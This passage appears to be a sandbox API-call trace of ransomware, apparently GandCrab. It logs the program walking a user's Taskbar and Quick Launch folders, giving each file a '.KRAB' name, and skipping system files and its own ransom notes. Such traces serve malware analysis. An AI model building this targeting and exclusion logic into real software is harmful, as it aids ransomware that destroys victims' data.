lpFindFileData=0x338e350) returned 1 [0060.122] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.122] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.122] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.122] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.122] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.122] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock" [0060.122] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.123] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 127 [0060.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\d2ca4a08d2ca4dee3d.lock") returned 122 [0060.123] lstrlenW (lpString=".lock") returned 5 [0060.123] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.123] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.123] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.123] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.124] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.124] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.124] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" [0060.124] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.124] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.KRAB") returned 115 [0060.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0060.124] lstrlenW (lpString=".ini") returned 4 [0060.124] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.124] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".ini ") returned 5 [0060.124] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0060.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0060.125] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0060.125] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.125] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.125] lstrcmpW (lpString1="Excel 2016.lnk", lpString2=".") returned 1 [0060.125] lstrcmpW (lpString1="Excel 2016.lnk", lpString2="..") returned 1 [0060.125] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Excel 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk" [0060.125] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.125] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk.KRAB") returned 118 [0060.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned 113 [0060.126] lstrlenW (lpString=".lnk") returned 4 [0060.126] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.126] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.126] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.126] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.126] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.126] lstrcmpW (lpString1="File Explorer.lnk", lpString2=".") returned 1 [0060.126] lstrcmpW (lpString1="File Explorer.lnk", lpString2="..") returned 1 [0060.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="File Explorer.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk" [0060.126] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.127] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk.KRAB") returned 121 [0060.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0060.127] lstrlenW (lpString=".lnk") returned 4 [0060.127] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.127] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.127] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.127] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.128] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.128] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.128] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.128] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt" [0060.128] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.128] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt.KRAB") returned 120 [0060.128] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt") returned 115 [0060.128] lstrlenW (lpString=".txt") returned 4 [0060.128] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.128] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.128] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt") returned 115 [0060.129] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\KRAB-DECRYPT.txt") returned 115 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.129] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.129] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.129] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.129] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0060.129] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0060.130] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Mozilla Firefox.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" [0060.130] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.130] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.KRAB") returned 123 [0060.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 118 [0060.130] lstrlenW (lpString=".lnk") returned 4 [0060.130] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.130] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.131] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.131] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.131] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.131] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2=".") returned 1 [0060.131] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2="..") returned 1 [0060.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="OneNote 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk" [0060.131] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.131] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk.KRAB") returned 120 [0060.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned 115 [0060.132] lstrlenW (lpString=".lnk") returned 4 [0060.132] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.132] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.132] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.132] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.132] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.132] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2=".") returned 1 [0060.132] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2="..") returned 1 [0060.132] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Outlook 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk" [0060.132] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.133] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk.KRAB") returned 120 [0060.133] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned 115 [0060.133] lstrlenW (lpString=".lnk") returned 4 [0060.133] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.133] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.133] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.133] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.134] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.134] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2=".") returned 1 [0060.134] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2="..") returned 1 [0060.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="PowerPoint 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk" [0060.134] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.134] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk.KRAB") returned 123 [0060.134] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned 118 [0060.134] lstrlenW (lpString=".lnk") returned 4 [0060.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.134] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.135] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.135] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.135] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.135] lstrcmpW (lpString1="Project 2016.lnk", lpString2=".") returned 1 [0060.135] lstrcmpW (lpString1="Project 2016.lnk", lpString2="..") returned 1 [0060.135] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Project 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk" [0060.135] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.135] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk.KRAB") returned 120 [0060.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk") returned 115 [0060.135] lstrlenW (lpString=".lnk") returned 4 [0060.136] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.136] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.136] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.136] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.136] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.136] lstrcmpW (lpString1="Visio 2016.lnk", lpString2=".") returned 1 [0060.136] lstrcmpW (lpString1="Visio 2016.lnk", lpString2="..") returned 1 [0060.136] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Visio 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk" [0060.136] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.137] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk.KRAB") returned 118 [0060.137] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk") returned 113 [0060.137] lstrlenW (lpString=".lnk") returned 4 [0060.137] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.137] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.137] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.137] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.138] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.138] lstrcmpW (lpString1="Word 2016.lnk", lpString2=".") returned 1 [0060.138] lstrcmpW (lpString1="Word 2016.lnk", lpString2="..") returned 1 [0060.138] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Word 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk" [0060.138] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.138] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk.KRAB") returned 117 [0060.138] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned 112 [0060.138] lstrlenW (lpString=".lnk") returned 4 [0060.138] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.138] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.139] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.139] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.139] FindNextFileW (in: hFindFile=0xfbd1e0, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0060.139] FindClose (in: hFindFile=0xfbd1e0 | out: hFindFile=0xfbd1e0) returned 1 [0060.148] CloseHandle (hObject=0x450) returned 1 [0060.152] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0060.152] FindClose (in: hFindFile=0xfbd4a0 | out: hFindFile=0xfbd4a0) returned 1 [0060.153] CloseHandle (hObject=0x448) returned 1 [0060.156] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.156] lstrcmpW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0060.156] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0060.156] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Window Switcher.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" [0060.156] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.156] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.KRAB") returned 103 [0060.157] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0060.157] lstrlenW (lpString=".lnk") returned 4 [0060.157] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.157] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0060.157] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.157] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.157] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0060.157] FindClose (in: hFindFile=0xfbd420 | out: hFindFile=0xfbd420) returned 1 [0060.158] CloseHandle (hObject=0x440) returned 1 [0060.158] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.158] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0060.158] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0060.158] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="UserData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0060.158] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") 